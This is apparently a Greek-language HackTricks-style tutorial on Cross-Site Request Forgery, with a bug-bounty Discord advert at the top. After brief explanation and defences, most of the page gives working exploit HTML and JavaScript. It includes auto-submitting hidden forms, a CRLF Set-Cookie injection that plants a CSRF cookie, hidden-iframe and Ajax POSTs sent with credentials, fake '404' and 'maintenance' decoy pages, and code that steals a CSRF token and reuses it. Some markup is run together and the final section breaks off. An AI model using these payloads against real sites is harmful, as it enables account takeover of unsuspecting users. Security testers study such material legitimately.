Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!
Hacking Insights
Engage with content that delves into the thrill and challenges of hacking
Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights
Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates
Join us onDiscord and start collaborating with top hackers today!
Cross-Site Request Forgery (CSRF) Explained
Cross-Site Request Forgery (CSRF) είναι ένας τύπος ευπάθειας ασφαλείας που βρίσκεται σε διαδικτυακές εφαρμογές. Επιτρέπει στους επιτιθέμενους να εκτελούν ενέργειες εκ μέρους ανυποψίαστων χρηστών εκμεταλλευόμενοι τις αυθεντικοποιημένες συνεδρίες τους. Η επίθεση εκτελείται όταν ένας χρήστης, ο οποίος είναι συνδεδεμένος σε μια πλατφόρμα θύμα, επισκέπτεται μια κακόβουλη ιστοσελίδα. Αυτή η ιστοσελίδα στη συνέχεια ενεργοποιεί αιτήματα στον λογαριασμό του θύματος μέσω μεθόδων όπως η εκτέλεση JavaScript, η υποβολή φορμών ή η λήψη εικόνων.
Prerequisites for a CSRF Attack
Για να εκμεταλλευτεί μια ευπάθεια CSRF, πρέπει να πληρούνται αρκετές προϋποθέσεις:
Identify a Valuable Action: Ο επιτιθέμενος πρέπει να βρει μια ενέργεια που αξίζει να εκμεταλλευτεί, όπως η αλλαγή του κωδικού πρόσβασης του χρήστη, του email ή η αναβάθμιση δικαιωμάτων.
Session Management: Η συνεδρία του χρήστη θα πρέπει να διαχειρίζεται αποκλειστικά μέσω cookies ή της κεφαλίδας HTTP Basic Authentication, καθώς άλλες κεφαλίδες δεν μπορούν να παραποιηθούν για αυτόν τον σκοπό.
Absence of Unpredictable Parameters: Το αίτημα δεν θα πρέπει να περιέχει απρόβλεπτες παραμέτρους, καθώς αυτές μπορούν να αποτρέψουν την επίθεση.
Quick Check
Μπορείτε να καταγράψετε το αίτημα στο Burp και να ελέγξετε τις προστασίες CSRF και για να δοκιμάσετε από τον περιηγητή μπορείτε να κάνετε κλικ στο Copy as fetch και να ελέγξετε το αίτημα:
Defending Against CSRF
Πολλές αντεπίθεσεις μπορούν να εφαρμοστούν για να προστατευτούν από επιθέσεις CSRF:
User Verification: Η προτροπή για τον κωδικό πρόσβασης του χρήστη ή η επίλυση ενός captcha μπορεί να επιβεβαιώσει την πρόθεση του χρήστη.
Checking Referrer or Origin Headers: Η επικύρωση αυτών των κεφαλίδων μπορεί να βοηθήσει να διασφαλιστεί ότι τα αιτήματα προέρχονται από αξιόπιστες πηγές. Ωστόσο, η προσεκτική διαμόρφωση των URLs μπορεί να παρακάμψει κακώς υλοποιημένους ελέγχους, όπως:
Χρησιμοποιώντας http://mal.net?orig=http://example.com (το URL τελειώνει με το αξιόπιστο URL)
Χρησιμοποιώντας http://example.com.mal.net (το URL ξεκινά με το αξιόπιστο URL)
Modifying Parameter Names: Η τροποποίηση των ονομάτων παραμέτρων σε αιτήματα POST ή GET μπορεί να βοηθήσει στην αποτροπή αυτοματοποιημένων επιθέσεων.
CSRF Tokens: Η ενσωμάτωση ενός μοναδικού CSRF token σε κάθε συνεδρία και η απαίτηση αυτού του token σε επόμενα αιτήματα μπορεί να μειώσει σημαντικά τον κίνδυνο CSRF. Η αποτελεσματικότητα του token μπορεί να ενισχυθεί με την επιβολή CORS.
Η κατανόηση και η εφαρμογή αυτών των αμυνών είναι κρίσιμη για τη διατήρηση της ασφάλειας και της ακεραιότητας των διαδικτυακών εφαρμογών.
Defences Bypass
From POST to GET
Ίσως η φόρμα που θέλετε να εκμεταλλευτείτε είναι προετοιμασμένη να στείλει ένα POST αίτημα με ένα CSRF token αλλά, θα πρέπει να ελέγξετε αν ένα GET είναι επίσης έγκυρο και αν όταν στείλετε ένα GET αίτημα το CSRF token εξακολουθεί να επικυρώνεται.
Lack of token
Οι εφαρμογές μπορεί να εφαρμόσουν έναν μηχανισμό για να επικυρώνουν tokens όταν είναι παρόντα. Ωστόσο, μια ευπάθεια προκύπτει αν η επικύρωση παραλειφθεί εντελώς όταν το token είναι απουσία. Οι επιτιθέμενοι μπορούν να εκμεταλλευτούν αυτό αφαιρώντας την παράμετρο που φέρει το token, όχι μόνο την τιμή του. Αυτό τους επιτρέπει να παρακάμψουν τη διαδικασία επικύρωσης και να διεξάγουν μια επίθεση Cross-Site Request Forgery (CSRF) αποτελεσματικά.
CSRF token is not tied to the user session
Οι εφαρμογές που δεν συνδέουν τα CSRF tokens με τις συνεδρίες χρηστών παρουσιάζουν σημαντικό κίνδυνο ασφαλείας. Αυτά τα συστήματα επαληθεύουν τα tokens έναντι μιας παγκόσμιας δεξαμενής αντί να διασφαλίζουν ότι κάθε token είναι δεσμευμένο με τη συνεδρία που το ξεκίνησε.
Ακολουθεί πώς οι επιτιθέμενοι εκμεταλλεύονται αυτό:
Authenticate χρησιμοποιώντας τον δικό τους λογαριασμό.
Obtain a valid CSRF token από την παγκόσμια δεξαμενή.
Use this token σε μια επίθεση CSRF κατά ενός θύματος.
Αυτή η ευπάθεια επιτρέπει στους επιτιθέμενους να κάνουν μη εξουσιοδοτημένα αιτήματα εκ μέρους του θύματος, εκμεταλλευόμενοι τον ανεπαρκή μηχανισμό επικύρωσης token της εφαρμογής.
Method bypass
Αν το αίτημα χρησιμοποιεί μια "περίεργη" μέθοδο, ελέγξτε αν η λειτουργίαπαρακαμής μεθόδου λειτουργεί. Για παράδειγμα, αν χρησιμοποιεί μέθοδο PUT μπορείτε να δοκιμάσετε να χρησιμοποιήσετε μια μέθοδο POST και να στείλετε: https://example.com/my/dear/api/val/num?_method=PUT
Αυτό μπορεί επίσης να λειτουργήσει στέλνοντας την παράμετρο _method μέσα σε ένα POST αίτημα ή χρησιμοποιώντας τις κεφαλίδες:
X-HTTP-Method
X-HTTP-Method-Override
X-Method-Override
Custom header token bypass
Αν το αίτημα προσθέτει μια προσαρμοσμένη κεφαλίδα με ένα token στο αίτημα ως μέθοδο προστασίας CSRF, τότε:
Δοκιμάστε το αίτημα χωρίς το Προσαρμοσμένο Token και επίσης την κεφαλίδα.
Δοκιμάστε το αίτημα με ακριβώς ίδιο μήκος αλλά διαφορετικό token.
CSRF token is verified by a cookie
Οι εφαρμογές μπορεί να εφαρμόσουν προστασία CSRF διπλασιάζοντας το token τόσο σε cookie όσο και σε παράμετρο αιτήματος ή ρυθμίζοντας ένα cookie CSRF και επαληθεύοντας αν το token που αποστέλλεται στο backend αντιστοιχεί στο cookie. Η εφαρμογή επικυρώνει τα αιτήματα ελέγχοντας αν το token στην παράμετρο αιτήματος ευθυγραμμίζεται με την τιμή στο cookie.
Ωστόσο, αυτή η μέθοδος είναι ευάλωτη σε επιθέσεις CSRF αν η ιστοσελίδα έχει ελαττώματα που επιτρέπουν σε έναν επιτιθέμενο να ρυθμίσει ένα cookie CSRF στον περιηγητή του θύματος, όπως μια ευπάθεια CRLF. Ο επιτιθέμενος μπορεί να εκμεταλλευτεί αυτό φορτώνοντας μια παραπλανητική εικόνα που ρυθμίζει το cookie, ακολουθούμενη από την έναρξη της επίθεσης CSRF.
Παρακάτω είναι ένα παράδειγμα του πώς θα μπορούσε να δομηθεί μια επίθεση:
<html><!-- CSRF Proof of Concept - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><formaction="https://example.com/my-account/change-email"method="POST"><inputtype="hidden"name="email"value="asd@asd.asd" /><inputtype="hidden"name="csrf"value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" /><inputtype="submit"value="Submit request" /></form><img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
</body></html>
Σημειώστε ότι αν το csrf token σχετίζεται με το cookie συνεδρίας, αυτή η επίθεση δεν θα λειτουργήσει γιατί θα χρειαστεί να ορίσετε τη συνεδρία του θύματος, και επομένως θα επιτίθεστε στον εαυτό σας.
Αλλαγή Content-Type
Σύμφωνα με αυτό, προκειμένου να αποφευχθούν οι προετοιμασμένες αιτήσεις χρησιμοποιώντας τη μέθοδο POST, οι επιτρεπόμενες τιμές Content-Type είναι:
application/x-www-form-urlencoded
multipart/form-data
text/plain
Ωστόσο, σημειώστε ότι η λογική των διακομιστών μπορεί να διαφέρει ανάλογα με το Content-Type που χρησιμοποιείται, οπότε θα πρέπει να δοκιμάσετε τις αναφερόμενες τιμές και άλλες όπως application/json,text/xml, application/xml.
Παράδειγμα (από εδώ) αποστολής δεδομένων JSON ως text/plain:
Παράκαμψη Προετοιμασίας Αιτημάτων για Δεδομένα JSON
Όταν προσπαθείτε να στείλετε δεδομένα JSON μέσω ενός POST αιτήματος, η χρήση του Content-Type: application/json σε μια HTML φόρμα δεν είναι άμεσα δυνατή. Ομοίως, η χρήση του XMLHttpRequest για την αποστολή αυτού του τύπου περιεχομένου ξεκινά ένα αίτημα προετοιμασίας. Παρ' όλα αυτά, υπάρχουν στρατηγικές για να παρακαμφθεί αυτή η περιοριστική κατάσταση και να ελεγχθεί αν ο διακομιστής επεξεργάζεται τα δεδομένα JSON ανεξαρτήτως του Content-Type:
Χρήση Εναλλακτικών Τύπων Περιεχομένου: Χρησιμοποιήστε Content-Type: text/plain ή Content-Type: application/x-www-form-urlencoded ορίζοντας enctype="text/plain" στη φόρμα. Αυτή η προσέγγιση δοκιμάζει αν το backend χρησιμοποιεί τα δεδομένα ανεξαρτήτως του Content-Type.
Τροποποίηση Τύπου Περιεχομένου: Για να αποφύγετε ένα αίτημα προετοιμασίας ενώ διασφαλίζετε ότι ο διακομιστής αναγνωρίζει το περιεχόμενο ως JSON, μπορείτε να στείλετε τα δεδομένα με Content-Type: text/plain; application/json. Αυτό δεν ενεργοποιεί ένα αίτημα προετοιμασίας αλλά μπορεί να επεξεργαστεί σωστά από τον διακομιστή αν είναι ρυθμισμένος να αποδέχεται application/json.
Χρήση Αρχείου SWF Flash: Μια λιγότερο κοινή αλλά εφικτή μέθοδος περιλαμβάνει τη χρήση ενός αρχείου SWF flash για να παρακαμφθούν τέτοιες περιοριστικές καταστάσεις. Για μια σε βάθος κατανόηση αυτής της τεχνικής, ανατρέξτε σε αυτή την ανάρτηση.
Παράκαμψη Ελέγχου Referrer / Origin
Αποφύγετε την κεφαλίδα Referrer
Οι εφαρμογές μπορεί να επικυρώνουν την κεφαλίδα 'Referer' μόνο όταν είναι παρούσα. Για να αποτρέψετε έναν περιηγητή από το να στείλει αυτή την κεφαλίδα, μπορεί να χρησιμοποιηθεί η παρακάτω HTML μετα-ετικέτα:
<metaname="referrer"content="never">
Αυτό διασφαλίζει ότι η κεφαλίδα 'Referer' παραλείπεται, πιθανώς παρακάμπτοντας τους ελέγχους επικύρωσης σε ορισμένες εφαρμογές.
Για να ορίσετε το όνομα τομέα του διακομιστή στη διεύθυνση URL που θα στείλει ο Referrer μέσα στις παραμέτρους μπορείτε να κάνετε:
<html><!-- Referrer policy needed to send the qury parameter in the referrer --><head><metaname="referrer"content="unsafe-url"></head><body><script>history.pushState('','','/')</script><formaction="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email"method="POST"><inputtype="hidden"name="email"value="asd@asd.asd" /><inputtype="submit"value="Submit request" /></form><script>// You need to set this or the domain won't appear in the query of the referer headerhistory.pushState("","","?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")document.forms[0].submit();</script></body></html>
HEAD μέθοδος παράκαμψης
Το πρώτο μέρος του αυτού του CTF writeup εξηγεί ότι ο πηγαίος κώδικας του Oak, ένας δρομολογητής, έχει ρυθμιστεί να χειρίζεται τα αιτήματα HEAD ως αιτήματα GET χωρίς σώμα απόκρισης - μια κοινή λύση που δεν είναι μοναδική για τον Oak. Αντί για έναν συγκεκριμένο χειριστή που ασχολείται με τα αιτήματα HEAD, απλά δίνονται στον χειριστή GET αλλά η εφαρμογή απλά αφαιρεί το σώμα απόκρισης.
Επομένως, αν ένα αίτημα GET περιορίζεται, μπορείτε απλά να στείλετε ένα αίτημα HEAD που θα επεξεργαστεί ως αίτημα GET.
Παραδείγματα Εκμετάλλευσης
Εξαγωγή CSRF Token
Αν χρησιμοποιείται ένα CSRF token ως άμυνα, μπορείτε να προσπαθήσετε να εξάγετε το εκμεταλλευόμενοι μια XSS ευπάθεια ή μια Dangling Markup ευπάθεια.
GET χρησιμοποιώντας HTML tags
<imgsrc="http://google.es?param=VALUE"style="display:none" /><h1>404 - Page not found</h1>The URL you are requesting is no longer available
Άλλες ετικέτες HTML5 που μπορούν να χρησιμοποιηθούν για να στείλουν αυτόματα ένα GET αίτημα είναι:
<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><formmethod="GET"action="https://victim.net/email/change-email"><inputtype="hidden"name="email"value="some@email.com" /><inputtype="submit"value="Submit request" /></form><script>document.forms[0].submit();</script></body></html>
Αίτημα POST φόρμας
<html><body><script>history.pushState('','','/')</script><formmethod="POST"action="https://victim.net/email/change-email"id="csrfform"><input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<inputtype="submit"value="Submit request" /><imgsrc=xonerror="csrfform.submit();" /> <!-- Way 2 to autosubmit --></form><script>document.forms[0].submit(); //Way 3 to autosubmit</script></body></html>
Αίτημα POST φόρμας μέσω iframe
<!--The request is sent through the iframe withuot reloading the page--><html><body><iframestyle="display:none"name="csrfframe"></iframe><formmethod="POST"action="/change-email"id="csrfform"target="csrfframe"><inputtype="hidden"name="email"value="some@email.com"autofocusonfocus="csrfform.submit();" /><inputtype="submit"value="Submit request" /></form><script>document.forms[0].submit();</script></body></html>
Αίτημα Ajax POST
<script>var xh;if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safarixh=newXMLHttpRequest();}else{// code for IE6, IE5xh=newActiveXObject("Microsoft.XMLHTTP");}xh.withCredentials =true;xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");</script><script>//JQuery version$.ajax({type:"POST",url:"https://google.com",data:"param=value¶m2=value2"})</script>
<--! expl.html --><bodyonload="envia()"><formmethod="POST"id="formulario"action="http://aplicacion.example.com/cambia_pwd.php"><inputtype="text"id="pwd"name="pwd"value="otra nueva"></form><body><script>functionenvia(){document.getElementById("formulario").submit();}</script><!-- public.html --><iframesrc="2-1.html"style="position:absolute;top:-5000"></iframe><h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
Κλέψε το CSRF Token και στείλε ένα POST αίτημα
functionsubmitFormWithTokenJS(token) {var xhr =newXMLHttpRequest();xhr.open("POST",POST_URL,true);xhr.withCredentials =true;// Send the proper header information along with the requestxhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");// This is for debugging and can be removedxhr.onreadystatechange=function() {if(xhr.readyState ===XMLHttpRequest.DONE&&xhr.status ===200) {//console.log(xhr.responseText);}}xhr.send("token="+ token +"&otherparama=heyyyy");}functiongetTokenJS() {var xhr =newXMLHttpRequest();// This tels it to return it as a HTML documentxhr.responseType ="document";xhr.withCredentials =true;// true on the end of here makes the call asynchronousxhr.open("GET",GET_URL,true);xhr.onload=function (e) {if (xhr.readyState ===XMLHttpRequest.DONE&&xhr.status ===200) {// Get the document from the responsepage =xhr.response// Get the input elementinput =page.getElementById("token");// Show the token//console.log("The token is: " + input.value);// Use the token to submit the formsubmitFormWithTokenJS(input.value);}};// Make the requestxhr.send(null);}varGET_URL="http://google.com?param=VALUE"varPOST_URL="http://google.com?param=VALUE"getTokenJS();
Κλέψε το CSRF Token και στείλε ένα Post αίτημα χρησιμοποιώντας ένα iframe, μια φόρμα και Ajax
Ο κώδικας μπορεί να χρησιμοποιηθεί για να επιτεθεί σε μια φόρμα σύνδεσης χρησιμοποιώντας ένα CSRF token (Χρησιμοποιεί επίσης την κεφαλίδα X-Forwarded-For για να προσπαθήσει να παρακάμψει μια πιθανή μαύρη λίστα IP):